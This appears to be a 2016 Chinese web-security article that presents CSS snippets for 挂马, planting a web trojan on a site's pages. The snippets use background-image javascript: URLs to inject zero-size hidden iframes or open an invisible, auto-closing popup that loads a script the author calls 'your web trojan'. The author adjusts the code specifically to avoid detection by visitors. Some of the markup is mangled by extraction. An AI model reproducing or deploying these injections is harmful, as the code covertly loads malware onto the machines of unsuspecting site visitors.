首页 > 安全 > 网络安全 >

真正能用,还有点效果的CSS挂马代码的方法

2016-07-04

网上流行的: body { background-image: url( & 039;javascript:document write( "<iframe src=http: www 2cto com test htm width=0 height=0>< iframe> ") & 039;) } 。

网上流行的:

body

{

background-image: url(&#39;javascript:document.write("

IFrame

")&#39;)

}

//此方法会使主页不正常.返回一片空白.

用弹窗.

body

{

background-image: url(&#39;javascript:open("http://www.2cto.com/test.htm")&#39;)

}

//弹出一个框.难看 易被发现.

改进一下:

body

{

background-image: url(javascript:open(&#39;http://www.2cto.com/test.htm&#39;,&#39;newwindow&#39;,&#39;height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no&#39;))

}

test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示:

a.js内容:

document.write(&#39;

IFrame

&#39;);

请指教.

相关文章
最新文章
热点推荐